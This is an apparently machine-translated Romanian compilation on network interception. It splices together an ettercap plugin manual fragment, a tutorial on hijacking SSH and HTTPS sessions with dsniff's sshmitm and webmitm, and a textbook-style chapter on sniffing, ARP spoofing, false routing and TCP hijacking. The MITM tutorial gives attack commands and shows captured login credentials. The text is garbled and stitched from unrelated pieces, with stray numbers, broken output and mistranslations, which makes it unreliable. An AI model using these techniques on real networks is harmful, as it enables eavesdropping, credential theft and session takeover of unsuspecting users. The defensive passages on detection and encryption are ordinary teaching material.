Vom verifica dacă cineva momează între noi și vreuna dintre gazdele de pe listă. În primul rând, verifică dacă două gazde din listă au același lucru Adresa mac. Acest lucru poate însemna că unul dintre ei ne otrăvește pretinzând că este celălalt. Poate genera o mulțime de fals pozitive într-un mediu proxy-arp. Trebuie să construiți o listă de gazde pentru a efectua această verificare. După aceea, trimite pachete de eco icmp către fiecare gazdă din listă și verifică dacă adresa mac a sursei de răspuns este diferită de adresa pe care am stocat-o în lista cu acel IP. Acest lucru ar putea însemna că cineva momează această gazdă pretinzând că are adresa noastră IP și trimițându-ne pachetele interceptate. Nu puteți rula acest test activ în modul neofensiv.

Ettercap -TQP scan_poisoner //

7.8 search_promisc

Încearcă să găsească dacă cineva adulmecă (ascultă) în modul promiscuu. Trimite două solicitări arp diferite formate prost către fiecare țintă din lista de gazde și așteaptă răspunsuri. Dacă răspunsul a venit de la gazda țintă, este mai mult sau mai puțin probabil ca ținta să aibă placa de rețea în modul promiscuu. Poate genera alarme false. Îl puteți rula fie din linia de comandă, fie din meniul de pluginuri. Deoarece ascultă răspunsurile arp, va fi mai bine dacă nu le utilizați în timp ce trimiteți cereri arp.

Ettercap -TQP search_promisc /192.168.0.1/ ettercap -TQP search_promisc //

Un exemplu de ghicire cu succes a două plăci de rețea în modul promiscuu:

Extinde

Root@HackWare:~# ettercap -TQP search_promisc ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team Ascultare pe: eth0 -> 08:00:27:AF:30:B9 192.168.1.35/255.255.250:25:5.00 fe:25:5. 27ff:feaf:30b9/64 Disecția SSL necesită un script valid „redir_command_on” în fișierul etter.conf. Este posibil ca Ettercap să nu funcționeze corect. /proc/sys/net/ipv6/conf/eth0/use_tempaddr nu este setat la 0. Privilegiile au scăzut la EUID 65534 EGID 65534... 33 plugin-uri 42 disector de protocol 57 porturi monitorizate 20388 amprenta furnizorului mac 1766 tcp OS2 fingerprint cunoscute : nu au fost specificate scripturi, nu pornesc! Randomizarea a 255 de gazde pentru scanare... Scanarea întregii mască de rețea pentru 255 de gazde... * |============================== ============= =====================>| 100,00% 5 gazde adăugate la lista de gazde... Se pornește sniffing unificat... Doar text Interfață activată... Apăsați „h” pentru ajutor inline Activarea plugin-ului search_promisc... search_promisc: Căutare NIC-uri promisc... Mai puțin probabil NIC-uri sniffing : - 192.168.1.36 - 192.168.1.34 Cel mai probabil sniffing NIC-uri: - NIMIC Închiderea interfeței text... Încheierea ettercap... Curățare Lua finalizată! Adulmecarea unificată a fost oprită.

7.9 sslstrip

În timpul unui atac SSL mitm, ettercap înlocuiește certificatul SSL real cu al său. Certificatul fals este creat din mers și toate câmpurile sunt completate în conformitate cu certificatul real prezentat de server.

(62%)

(56.5%)

(ALEATOARE - 0,2%)

În acest articol ne vom uita la atacuri precum Man-in-the-Middle, sau mai degrabă metoda
redirecționarea traficului SSH și HTTP folosind atacul Man in the Middle. Să nu tragem pisica de coadă, dar să trecem la treabă.

Man in the Middle (pe scurt MitM, din rusă pur și simplu - „atacul intermediarului” sau „om
in the middle") este un tip de atac bazat pe redirecționarea traficului între două mașini pentru a intercepta informații - studiați în continuare, distrugeți sau modificați. Așadar, primul lucru de care avem nevoie este pachetul dsniff (veți vedea un link către pachet la adresa sfârșitul articolului). De ce Da, deoarece acest pachet conține toate utilitățile necesare, inclusiv sshmitm (redirecționarea traficului SSH) și httpmitm (redirecționarea traficului HTTP), care pot ocoli următoarea schemă de securitate: din câte știți, protocoale cu criptarea datelor este destul de -sunt „securizate” (criptarea ajută :)) și nu permit ca atacurile să fie efectuate „pe deasupra” stratului de rețea.Cheia de criptare este necunoscută hackerului - este imposibil să decriptați datele și introduceți și o comandă.Totul pare în regulă, dar iată cum
deoarece programele de atac MitM (sshmitm și httpmitm) din pachetul dsniff pot ocoli acest sistem securitate (puteți ocoli aproape totul). Toate acestea se realizează conform următorului principiu:
gazda intermediară primește cererea de la client, „spunându-i” că este serverul, apoi conectându-se la serverul real.
Al doilea lucru de care avem nevoie sunt brațele drepte, al patrulea lucru - cel mai important lucru - este dorința și, bineînțeles, o victimă, adică computerul pe care îl vom ataca.

Redirecționarea traficului SSH

După ce ați pregătit instrumentele, ați înțeles ce este ce și de ce :). Obțineți sshmitm - acum vom redirecționa traficul SSH (tot ce nu ați înțeles cu partea teoretică - citiți mai sus)
folosind-o, profitând de neajunsurile PKI (infrastructura cheii publice) de astăzi - o schemă de management al cheilor bazată pe
metode de criptografie asimetrică). Să ne uităm la sintaxă
sshmitm:

sshmitm [-d] [-I] [-p port] gazdă

D
permiteți ieșirea de depanare (adică un mod mai avansat)

eu
deturnarea sesiunii

portul P
portul de ascultare

gazdă
adresa gazdei la distanță ale cărei sesiuni vor fi interceptate

port
portul de pe gazda la distanță

Totul pare simplu și de bun gust - nu este nimic complicat :). Să începem să punem în aplicare atacul!

# sshmitm server.target.gov // specificați serverul dvs. SSH
sshmitm: retransmitere către server server.target.gov

Deoarece nu avem o cheie SSH reală, interpretul de comandă al celui atacat
va afișa o solicitare de verificare a cheii gazdei, totul va arăta cam așa:

clientmachine$ server.target.gov
@ATENȚIE: IDENTIFICAREA GAZDEI LA DISTANȚĂ S-A SCHIMBAT! @
ESTE POSIBIL CA CINEVA SĂ FACĂ CEVA RĂUS!
Cineva s-ar putea să te asculte cu urechea chiar acum (atac de om-in-the-middle)!
De asemenea, este posibil ca cheia gazdă RSA să fi fost tocmai schimbată.
Vă rugăm să contactați administratorul de sistem.

Și apoi utilizatorul va decide dacă se conectează sau nu. Dacă da, atunci vom avea control deplin asupra sesiunii SSH.
DAR! Dacă utilizatorul nu s-a conectat niciodată la acea mașină, este posibil să fie afișat următorul mesaj:

Autenticitatea gazdei „server.target.gov” nu poate fi stabilită
Amprenta cheii RSA este
bla:bla:bla;bla;bla........
Sigur doriți să continuați conectarea (da/nu)?

Aici utilizatorul are, de asemenea, două opțiuni - să se conecteze sau nu. Daca da, atunci am interceptat sedinta, daca nu, atunci vai... :(.
În general, atacul a avut succes dacă utilizatorul s-a conectat, iar sshmitm, la rândul său, a înregistrat toate trecerile și autentificarea și într-o manieră foarte lizibilă :)
Desigur, acesta nu este singurul interceptor de sesiune SSH, dar odată ce vă familiarizați cu acesta, puteți stăpâni cu ușurință altul :)

Redirecționarea traficului HTTP

Acum vom redirecționa traficul HTTP. Din nou, vom avea nevoie de un instrument selectat anterior: httpmitm, care ascultă porturile 80 (HTTP -) și 443 (HTTPS -), interceptează cererile WEB, apoi se conectează la server și transmite cererile către computerul client. Programul generează, de asemenea, chei SSL și certificate SSL folosind OpenSSL. Apoi, după ce am încercat
se conectează la site (target.gov), browserul va verifica certificatul SSL. Deoarece certificatele nu se potrivesc, browserul utilizatorului va avertiza despre
certificat SSL incorect. Din perspectiva atacatorului, va arăta cam așa:

#webmitm -d
webmitm: transmiterea transparentă
webmitm: conexiune nouă de la
GET [link]/uzerz.php?user=hellknights&parola=neskaju1qwerty HTTP/[versiune]
Tipul conexiunii]
Gazdă: www.target.gov
User-Agent: [sistem, informații despre browser]
[etc, etc, etc]
Cookie: [cookie-uri]

Așa arată totul din exterior -
conexiunea SSL este interceptată, captând date necriptate.

Concluzie

În acest articol, ne-am uitat la redirecționarea traficului SSH și HTTP folosind atacul Man in the Middle - în mod clar, în detaliu, pe scurt. Alți redirectori HTTP și SSH
Vei stăpâni traficul folosind MitM rapid dacă le-ai stăpânit și pe acestea :)). Dacă ceva nu era clar, atunci...

Interceptarea datelor într-o rețea este primirea oricărei informații de la un dispozitiv computerizat la distanță. Poate consta din informațiile personale ale utilizatorului, mesajele acestuia și înregistrările vizitelor site-ului web. Captarea datelor poate fi efectuată cu ajutorul programelor spion sau folosind sniffer de rețea.

Spyware este un software special care poate înregistra toate informațiile transmise printr-o rețea de la o anumită stație de lucru sau dispozitiv.

Un sniffer este un program sau o tehnologie computerizată care interceptează și analizează traficul care trece printr-o rețea. Sniffer-ul vă permite să vă conectați la o sesiune web și să efectuați diverse operațiuni în numele proprietarului computerului.

Dacă informațiile nu sunt transmise în timp real, spyware generați rapoarte care facilitează vizualizarea și analizarea informațiilor.

Interceptarea rețelei poate fi efectuată legal sau ilegal. Principalul document care stabilește legalitatea obținerii de informații este Convenția privind criminalitatea cibernetică. A fost creat în Ungaria în 2001. Cerințele legale pot varia ușor de la stat la stat, dar mesajul cheie este același pentru toate țările.

Clasificare și metode de interceptare a datelor prin rețea

În conformitate cu cele de mai sus, interceptarea informațiilor într-o rețea poate fi împărțită în două tipuri: autorizată și neautorizată.

Captarea autorizată a datelor se realizează în diverse scopuri, de la protejarea informațiilor corporative până la asigurarea securității naționale. Motivele pentru efectuarea unei astfel de operațiuni sunt stabilite de legislație, servicii speciale, oficiali ai legii și specialiști organizatii administrativeși servicii de securitate ale companiei.

Există standarde internaționale pentru efectuarea interceptării datelor. Institutul European de Standarde de Telecomunicații a reușit să armonizeze o serie de procese tehnice (ETSI ES 201 158 „Securitatea telecomunicațiilor; Interceptarea legală (LI); Cerințe pentru funcțiile de rețea”) pe care se bazează interceptarea informațiilor. Ca urmare, a fost dezvoltată o arhitectură de sistem care ajută specialiștii serviciilor secrete și administratorii de rețea să obțină date din rețea în mod legal. Structura dezvoltată pentru implementarea interceptării datelor în rețea este utilizată pentru cablate și sisteme wireless apeluri vocale, precum și corespondență prin poștă, transmitere de mesaje vocale prin IP, schimb de informații prin SMS.

Interceptarea neautorizată a datelor într-o rețea este efectuată de atacatori care doresc să intre în posesia datelor confidențiale, parole, secrete corporative, adrese ale computerelor din rețea etc. Pentru a-și atinge obiectivele, hackerii folosesc de obicei un analizor de trafic de rețea - un sniffer. Acest program sau un dispozitiv hardware-software oferă fraudatorului capacitatea de a intercepta și analiza informațiile din rețeaua la care utilizatorul victimă este conectat, inclusiv traficul SSL criptat prin falsificarea certificatelor. Datele de trafic pot fi obținute în diferite moduri:

ascultarea interfeței de rețea,
conectarea unui dispozitiv de interceptare la o întrerupere a canalului,
crearea unei ramuri de trafic și duplicarea acesteia către sniffer,
prin efectuarea unui atac.

Există, de asemenea, tehnologii mai complexe pentru interceptarea informațiilor importante care permit interacțiunilor în rețea și schimba datele. O astfel de tehnică este cererile ARP falsificate. Esența metodei este înlocuirea adreselor IP între computerul victimei și dispozitivul atacatorului. O altă metodă care poate fi folosită pentru a intercepta date printr-o rețea este rutarea falsă. Aceasta implică înlocuirea adresei IP a unui router de rețea cu propria ta adresă. Dacă un criminal cibernetic știe cum este organizată rețeaua locală în care se află victima, atunci el poate organiza cu ușurință primirea informațiilor de la aparatul utilizatorului la adresa sa IP. Capturarea unei conexiuni TCP servește, de asemenea într-un mod eficient interceptarea datelor. Atacatorul întrerupe sesiunea de comunicare prin generarea și trimiterea de pachete TCP către computerul victimei. În continuare, sesiunea de comunicare este restabilită, interceptată și continuată de infractor în locul clientului.

Obiect de influență

Obiectele de interceptare a datelor prin intermediul rețelei pot fi agenții guvernamentale, întreprinderi industriale, structuri comerciale și utilizatori obișnuiți. În cadrul unei organizații sau al unei companii de afaceri, informațiile pot fi captate pentru a proteja infrastructura rețelei. Agențiile de informații și agențiile de aplicare a legii pot efectua interceptări în masă a informațiilor transmise de la diferiți proprietari, în funcție de sarcina la îndemână.

Dacă vorbim de criminali cibernetici, atunci orice utilizator sau organizație poate deveni obiect de influență pentru a obține date transmise prin rețea. Cu acces autorizat, partea informativă a informațiilor primite este importantă, în timp ce un atacator este mai interesat de datele care pot fi folosite pentru a sechestra în numerar sau informații valoroase pentru vânzarea sa ulterioară.

Cel mai adesea, utilizatorii care se conectează la o rețea publică, de exemplu într-o cafenea cu un hotspot, devin victime ale interceptării informațiilor de către infractorii cibernetici. Acces la Wi-Fi. Un atacator se conectează la o sesiune web folosind un sniffer, înlocuiește datele și fură informații personale. Citiți mai multe despre cum se întâmplă acest lucru în articol.

Sursa amenințării

Interceptarea autorizată a informațiilor în companii și organizații este efectuată de operatorii de infrastructură publică a rețelei. Activitățile lor vizează protejarea datelor cu caracter personal, secretelor comerciale și altele Informații importante. Din punct de vedere legal, transferul de mesaje și fișiere poate fi monitorizat de serviciile de informații, agențiile de aplicare a legii și diverse agenții guvernamentale pentru a asigura securitatea cetățenilor și a statului.

Infractorii sunt implicați în interceptări ilegale de date. Pentru a evita să deveniți victima unui infractor cibernetic, trebuie să urmați câteva recomandări de la experți. De exemplu, nu trebuie să efectuați operațiuni care necesită autorizare și transfer de date sensibile în locurile în care conexiunea este la rețele publice. Este mai sigur să alegeți rețele cu criptare și chiar mai bine - să utilizați modemuri personale 3G și LTE. Când transferați date personale, se recomandă să le criptați folosind protocolul HTTPS sau un tunel VPN personal.

Vă puteți proteja computerul de interceptarea traficului de rețea folosind criptografie și anti-sniffer; Dial-up, mai degrabă decât accesul la rețeaua wireless, va reduce riscurile.

Această lecție descrie tehnologiile de hacking în rețea bazate pe interceptarea pachetelor de rețea. Hackerii folosesc astfel de tehnologii pentru a asculta traficul de rețea pentru a fura informații valoroase, pentru a organiza interceptarea datelor în scopul unui atac de tip om-in-the-middle, pentru a intercepta conexiunile TCP, permițând, de exemplu, falsificarea datelor și pentru a efectua alte actiuni la fel de interesante. Din păcate, majoritatea acestor atacuri sunt implementate de fapt doar pentru rețelele Unix, pentru care hackerii pot folosi ambele utilitati speciale, și instrumentele de sistem Unix. Rețelele Windows, aparent, au fost ignorate de hackeri și suntem forțați să ne limităm descrierea instrumentelor de interceptare a datelor la programele de sniffer concepute pentru ascultarea trivială a pachetelor de rețea. Cu toate acestea, nu ar trebui să neglijăm cel puțin o descriere teoretică a unor astfel de atacuri, în special pentru anti-hackeri, deoarece cunoașterea tehnologiilor de hacking utilizate va ajuta la prevenirea multor probleme.

Mirosirea rețelei

Utilizat de obicei pentru sniffing rețele Ethernet. plăci de rețea a trecut în modul de ascultare. Ascultare Rețele Ethernet necesită conectarea unui computer care rulează un program sniffer la un segment de rețea, după care tot traficul de rețea trimis și primit de computerele din acest segment de rețea devine disponibil pentru hacker. Este și mai ușor să interceptați traficul din rețelele radio care folosesc intermediari de rețele wireless - în acest caz, nici nu trebuie să căutați un loc pentru a vă conecta la cablu. Sau un atacator se poate conecta la linia telefonică care conectează computerul la serverul de Internet, găsind un loc convenabil pentru aceasta (liniile telefonice sunt de obicei așezate în subsoluri și în alte locuri rar vizitate fără nicio protecție).

Pentru a demonstra tehnologia de sniffer, vom folosi foarte popularul program de sniffer SpyNet, care poate fi găsit pe multe site-uri Web. Site-ul oficial al programului SpyNet se află la http://members.xoom.com/layrentiu2/, de unde puteți descărca o versiune demo a programului.

Programul SpyNet este format din două componente - CaptureNet și PipeNet. Programul CaptureNet vă permite să interceptați pachete transmise printr-o rețea Ethernet la nivel de rețea, de ex. sub formă de cadre Ethernet. Software-ul PipeNet vă permite să asamblați cadre Ethernet în pachete de nivel de aplicație, restabilind, de exemplu, mesajele E-mail, mesaje protocol HTTP (schimb de informații cu serverul Web) și îndeplinesc alte funcții.

Din păcate, în demonstrația SpyNet, capabilitățile PipeNet sunt limitate la demonstrația de asamblare a pachetelor HTTP, așa că nu vom putea demonstra SpyNet în întregime. Cu toate acestea, vom demonstra capacitățile de adulmecare a rețelei ale SpyNet folosind rețeaua noastră experimentală ca exemplu, prin trecerea fisier text de la gazda Sword-2000 la gazda Alex-Z folosind cele obișnuite Windows Explorer. Totodată, pe computerul A1ex-1 vom lansa programul CaptureNet, care va intercepta pachetele transmise și ne va permite să citim conținutul fișierului transmis în cadre Ethernet. În fig. 1 arată textul mesajului secret în fișierul secret.txt; vom încerca să găsim acest text în cadrele Ethernet capturate.

Orez. 1. Textul mesajului secret în fereastra Notepad

Pentru a captura cadre Ethernet, urmați acești pași:

Pe computerul Alex-Z, rulați programul CaptureNet. În fereastra de lucru afișată a programului, selectați comanda de meniu Capture * Start (Capture * Start) și începeți procesul de interceptare a cadrelor de rețea.

Folosind Windows Explorer, copiați fișierul security.txt de pe computerul Sword-2000 pe A1ex-3.

După transferul fișierului secret.txt, selectați comanda de meniu Capture * Stop și opriți procesul de capturare.

Cadrele Ethernet capturate vor apărea în partea dreaptă a ferestrei programului CaptureNet (Figura 2), fiecare rând din lista de sus reprezentând un cadru Ethernet, iar sub listă conținutul cadrului selectat.

Orez. 2. Cadrul Ethernet conține textul mesajului secret

După ce am căutat prin lista de cadre interceptate, îl putem găsi cu ușurință pe cel care conține textul pe care l-am transmis. Acesta este un secret foarte mare (Acesta este un secret foarte mare).

Subliniem că acesta este cel mai simplu exemplu, când a fost înregistrat tot traficul de rețea interceptat. CaptureNet vă permite să interceptați pachete trimise prin anumite protocoale și către anumite porturi gazdă, să selectați mesaje cu conținut specific și să acumulați datele capturate într-un fișier. Tehnica de efectuare a unor astfel de acțiuni este simplă și poate fi învățată folosind sistemul de ajutor al programului SpyNet.

Pe lângă interceptarea primitivă a rețelei, hackerii au acces la mijloace mai sofisticate de interceptare a datelor. Mai jos este o scurtă prezentare a acestor metode, deși din punct de vedere teoretic. Motivul este că pentru rețelele Windows, implementarea practică a atacurilor de interceptare a datelor este extrem de limitată, iar setul de utilități de încredere pentru atacurile de interceptare este destul de slab.

Metode de interceptare a traficului de rețea

Mirosirea rețelei folosind programe de analiză de rețea precum CaptureNet de mai sus este primul și cel mai simplu mod de a intercepta datele. Pe lângă SpyNet, multe instrumente sunt folosite pentru sniffing-ul rețelei, dezvoltate inițial în scopul analizei activității rețelei, diagnosticării rețelelor, selectării traficului conform criteriilor specificate și altor sarcini de administrare a rețelei. Un exemplu de astfel de program este tcpdump (http://www.tcpdump.org), care vă permite să înregistrați traficul de rețea într-un jurnal special pentru analiza ulterioară.

Pentru a proteja împotriva interceptării în rețea, sunt utilizate programe speciale, de exemplu, AntiSniff (http://www.securitysoftwaretech.com/antisniff), care sunt capabile să identifice computerele din rețea care ascultă traficul de rețea. Pentru a-și rezolva problemele, programele antisniffer folosesc un semn special al prezenței dispozitivelor de ascultare în rețea - placa de rețea a computerului sniffer trebuie să fie într-un mod special de ascultare. În modul de ascultare, computerele din rețea reacționează într-un mod special la datagramele IP trimise gazdei care este testată. De exemplu, gazdele care ascultă procesează de obicei tot traficul de intrare, nu doar datagramele trimise la adresa gazdei. Există și alte semne care indică un comportament suspect al gazdei pe care AntiSniff le poate recunoaște.

Cereri ARP false

Pentru a intercepta și prelua procesul de interacțiune a rețelei dintre două gazde A și B, un atacator poate înlocui adresele IP ale gazdelor care interacționează cu propria sa adresă IP, trimițând mesaje ARP (Address Resolution Protocol) falsificate către gazdele A și B. Puteți face cunoștință cu protocolul ARP din Anexa D, care descrie procedura de rezolvare (conversie) a adresei IP a gazdei la adresa mașinii (adresa MAC) codificată pe placa de rețea a gazdei. Să vedem cum un hacker poate folosi ARP pentru a intercepta comunicațiile de rețea dintre gazdele A și B.

Atacatorul determină adresele MAC ale gazdelor A și B, de exemplu, folosind comanda nbtstat din pachetul W2RK.

Atacatorul trimite mesaje către adresele MAC identificate ale gazdelor A și B, care sunt răspunsuri ARP falsificate la solicitările de rezolvare a adreselor IP ale gazdelor la adresele MAC ale computerelor. Gazda A este informată că adresa IP a gazdei B corespunde adresei MAC a computerului atacatorului; gazda B este informată că adresa IP a gazdei A corespunde, de asemenea, adresei MAC a computerului atacatorului.

Gazdele A și B stochează adresele MAC primite în memoria cache ARP și apoi le folosesc pentru a trimite mesaje unul altuia. Deoarece adresele IP A și B corespund adresei MAC a computerului atacatorului, gazdele A și B comunică fără bănuială printr-un intermediar care poate face orice cu mesajele lor.

Pentru a se proteja împotriva unor astfel de atacuri, administratorii de rețea trebuie să mențină o bază de date cu un tabel de corespondență între adresele MAC și adresele IP ale computerelor din rețea. Apoi, folosind un special software De exemplu, utilitarele arpwatch (ftp://ftp.ee.lbl.gov/arpwatch-2.lab.tar.gz) pot cerceta periodic rețeaua și pot identifica inconsecvențele.

Pe rețelele UNIX, acest tip de atac de solicitare ARP falsificat poate fi implementat folosind utilitare de sistem pentru monitorizarea și gestionarea traficului de rețea, cum ar fi arpredirect. Din păcate, astfel de utilitare de încredere nu par să fie implementate pe rețelele Windows 2000/XP. De exemplu, pe site-ul web NTsecurity (http://www.ntsecurity.nu) puteți descărca utilitarul GrabitAII, prezentat ca un instrument pentru redirecționarea traficului între gazdele rețelei. Cu toate acestea, o verificare de bază a funcționalității utilitarului GrabitAII arată că succesul complet în implementarea funcțiilor sale este încă departe.

Dirijare falsă

Pentru a efectua rutarea falsă, atacatorul trebuie să cunoască câteva detalii despre organizarea rețelei locale în care se află gazda A, în special, adresa IP a routerului prin care se trimite traficul de la gazda A la B. Știind acest lucru, atacatorul va genera o datagramă IP în care IP - adresa expeditorului este definită ca adresa IP a routerului, iar destinatarul este gazda A. De asemenea, în datagramă este inclus un mesaj de redirecționare ICMP cu câmpul adresei noului router setat la Adresa IP a computerului atacatorului. După ce a primit un astfel de mesaj, gazda A va trimite toate mesajele la adresa IP a computerului atacatorului.

Exemplele de mai sus de interceptări (la care capacitățile atacatorilor sunt departe de a fi limitate) ne convinge de necesitatea de a proteja datele transmise prin rețea dacă datele conțin informații confidențiale. Singura metodă de protecție împotriva interceptărilor traficului de rețea este utilizarea programelor care implementează algoritmi criptografici și protocoale de criptare și împiedică dezvăluirea și înlocuirea informațiilor secrete. Pentru a rezolva astfel de probleme, criptografia oferă instrumente pentru criptarea, semnarea și verificarea autenticității mesajelor transmise prin protocoale securizate

Implementarea practică a tuturor metodelor criptografice pentru protejarea schimbului de informații descrise în Capitolul 4 este asigurată de rețele VPN (Virtual Private Network). O scurtă prezentare generală a principiilor și tehnicilor de securitate criptografică poate fi găsită în Anexa E și descriere detaliata instrumente de protecție criptografică furnizate de aplicația PGP Desktop Security (http://www.pgp.com).

Interceptarea conexiunii TCP

Au fost create mai multe utilitare eficiente pentru a efectua atacuri de deturnare a conexiunii TCP, dar toate sunt implementate pentru platforma Unix, iar pe site-urile Web aceste utilitare sunt prezentate doar sub formă de cod sursă. Astfel, ca practicanți convinși de cauza nobilă a hackingului, atacurile care folosesc metoda de interceptare a conexiunii TCP nu ne sunt de mare folos. (Cei cărora le place să înțeleagă codul programului altor persoane pot consulta site-ul http://www.cri.cz/~kra/index.html, de unde puteți descărca sursă binecunoscutul utilitar de interceptare a conexiunii Hunt TCP de la Pavel Krauz).

În ciuda lipsei de instrumente practice, nu putem ignora un subiect atât de interesant precum interceptarea conexiunilor TCP și ne vom opri asupra unor aspecte ale unor astfel de atacuri. Câteva informații despre structura unui pachet TCP și procedura de stabilire a conexiunilor TCP sunt date în Anexa D a acestei cărți, dar aici ne vom concentra pe întrebarea - ce anume permite hackerilor să efectueze atacuri de interceptare a conexiunii TCP? Să luăm în considerare acest subiect mai detaliat, bazându-ne în principal pe discuția din și.

Protocolul TCP (Transmission Control Protocol) este unul dintre protocoalele de bază ale stratului de transport OSI care vă permite să stabiliți conexiuni logice pe un canal de comunicație virtual. Pe acest canal, pachetele sunt transmise și recepționate cu secvența lor înregistrată, fluxul de pachete este controlat, retransmisia pachetelor distorsionate este organizată, iar la sfârșitul sesiunii canalul de comunicație este întrerupt. Protocolul TCP este singurul protocol de bază din familia TCP/IP care are un sistem avansat de identificare și conectare a mesajelor.

Pentru a identifica un pachet TCP, există doi identificatori pe 32 de biți în antetul TCP, care acționează și ca contoare de pachete, numite număr de secvență și număr de confirmare. Vom fi interesați și de încă un câmp al pachetului TCP, numit biți de control. Acest câmp de 6 biți include următorii biți de control (în ordine de la stânga la dreapta):

URG - steag de urgență;

ACK - steag de confirmare;

PSH - steag de transport;

RST - flag de restabilire a conexiunii;

SYN - steag de sincronizare;

FIN - flag de terminare a conexiunii.

Să ne uităm la procedura pentru crearea unei conexiuni TCP.

1. Dacă gazda A trebuie să creeze o conexiune TCP cu gazda B, atunci gazda A trimite gazda B următorul mesaj:

A -> B: SYN, ISa

Aceasta înseamnă că mesajul trimis de gazda A are marcajul SYN (Synchronize sequence number) setat, iar câmpul numărului de secvență este setat la valoarea inițială de 32 de biți ISSa (Initial Sequence Number).

2. Ca răspuns la cererea primită de la gazda A, gazda B răspunde cu un mesaj în care bitul SYN este setat și bitul ACK este setat. În câmpul cu numărul de secvență, gazda B își stabilește valoarea inițială a contorului - ISSb; câmpul de număr de confirmare va conține apoi valoarea ISSa primită în primul pachet de la gazda A, mărită cu unu. Deci gazda B răspunde cu acest mesaj:

B -> A: SYN, ACK, ISSb, ACK(ISSa+1)

3. În cele din urmă, gazda A trimite un mesaj către gazda B, în care: bitul ACK este setat; câmpul cu numărul de ordine conține valoarea ISSa + 1; Câmpul cu numărul de confirmare conține valoarea ISSb + 1. După aceasta, conexiunea TCP între gazdele A și B este considerată stabilită:

A -> B: ACK, ISSa+1, ACK(ISSb+1)

4. Acum gazda A poate trimite pachete de date către gazda B prin canalul TCP virtual nou creat:

A -> B: ACK, ISSa+1, ACK(ISSb+1); DATE

Aici DATA înseamnă date.

Din algoritmul pentru crearea unei conexiuni TCP discutat mai sus, se poate observa că singurii identificatori ai abonaților TCP și o conexiune TCP sunt doi parametri de 32 de biți ai numărului de secvență și a numărului de confirmare - ISSa și ISSb. Prin urmare, dacă un hacker reușește să afle valorile curente ale câmpurilor ISSa și ISSb, atunci nimic nu îl va împiedica să genereze un pachet TCP falsificat. Aceasta înseamnă că un hacker trebuie doar să selecteze valorile curente ale parametrilor ISSa și ISSb ai unui pachet TCP pentru o anumită conexiune TCP, să trimită pachetul de la orice gazdă de Internet în numele clientului acestei conexiuni TCP și acest pachet va fi perceput ca corect!

Pericolul unui astfel de spoofing de pachete TCP este de asemenea important deoarece protocoalele de nivel înalt FTP și TELNET sunt implementate pe baza protocolului TCP, iar identificarea clienților de pachete FTP și TELNET se bazează în întregime pe protocolul TCP.

În plus, deoarece protocoalele FTP și TELNET nu verifică adresele IP ale expeditorilor de mesaje, după primirea unui pachet falsificat, serverele FTP sau TELNET vor trimite un mesaj de răspuns la adresa IP a gazdei hackerului specificată în pachetul fals. După aceasta, gazda hackerului va începe să lucreze cu serverul FTP sau TELNET de la adresa sa IP, dar cu drepturile unui utilizator conectat legal, care, la rândul său, va pierde contactul cu serverul din cauza nepotrivirii contoarelor.

Astfel, pentru a efectua atacul descris mai sus, o condiție necesară și suficientă este cunoașterea celor doi parametri actuali pe 32 de biți ISSa și ISSb care identifică conexiunea TCP. Sa luam in considerare moduri posibile primindu-le. În cazul în care gazda hackerului este conectată la segmentul de rețea atacat, sarcina de a obține valorile ISSa și ISSb este banală și poate fi rezolvată prin analiza traficului de rețea. Prin urmare, este necesar să se înțeleagă clar că protocolul TCP permite, în principiu, protejarea unei conexiuni numai dacă este imposibil ca un atacator să intercepteze mesajele transmise prin această legătură, adică numai în cazul în care gazda hackerului este conectată la un segment de rețea diferit de segmentul de abonat al conexiunii TCP.

Prin urmare, atacurile intersegmentare prezintă cel mai mare interes pentru un hacker, atunci când atacatorul și ținta sa se află în diferite segmente de rețea. În acest caz, sarcina de a obține valorile ISSa și ISSb nu este trivială. Pentru a rezolva această problemă, acum au fost inventate doar două metode.

Predicția matematică a valorii inițiale a parametrilor conexiunii TCP prin extrapolarea valorilor anterioare ale ISSa și ISSb.

Exploatarea vulnerabilităților în identificarea abonaților conexiunii TCP pe serverele Unix rsh.

Prima sarcină este rezolvată prin studii aprofundate ale implementării protocolului TCP în diverse sisteme de operare iar acum are o semnificaţie pur teoretică. A doua problemă este rezolvată folosind vulnerabilități sisteme Unix prin identificarea gazdelor de încredere. (De încredere în ceea ce privește o anumită gazdă A este o gazdă de rețea B al cărei utilizator se poate conecta la gazda A fără autentificare folosind serviciul r al gazdei A). Prin manipularea parametrilor pachetelor TCP, un hacker poate încerca să uzurpare identitatea unei gazde de încredere și să intercepteze o conexiune TCP cu gazda atacată.

Toate acestea sunt foarte interesante, dar rezultatele practice ale acestui gen de cercetare nu sunt încă vizibile. Prin urmare, sfătuim pe toți cei care doresc să aprofundeze acest subiect să apeleze la carte, de unde au fost preluate în principal informațiile prezentate mai sus.

Concluzie

Interceptarea datelor din rețea este cea mai eficientă metodă de hacking în rețea, permițând unui hacker să obțină aproape toate informațiile care circulă în rețea. Cea mai mare dezvoltare practică a fost obținută prin instrumentele de sniffing, de ex. ascultarea rețelelor; Totuși, nu putem ignora metodele de interceptare a datelor din rețea, efectuate prin interferarea cu funcționarea normală a rețelei pentru a redirecționa traficul către o gazdă hacker, în special metodele de interceptare a conexiunilor TCP. Cu toate acestea, în practică, ultimele metode menționate nu au primit încă o dezvoltare suficientă și trebuie îmbunătățite.

Un anti-hacker ar trebui să știe că singura salvare de la interceptarea datelor este criptarea acestora, adică. metode de protecție criptografică. Când trimiteți un mesaj prin rețea, ar trebui să presupuneți în prealabil că sistemul de cablu al rețelei este absolut vulnerabil și orice hacker conectat la rețea va putea prinde toate mesajele secrete transmise de la acesta. Există două tehnologii pentru a rezolva această problemă - crearea unei rețele VPN și criptarea mesajelor în sine. Toate aceste sarcini sunt foarte ușor de rezolvat folosind pachetul software PGP Desktop Security (descrierea acestuia poate fi găsită, de exemplu, în).

Popular în categoria: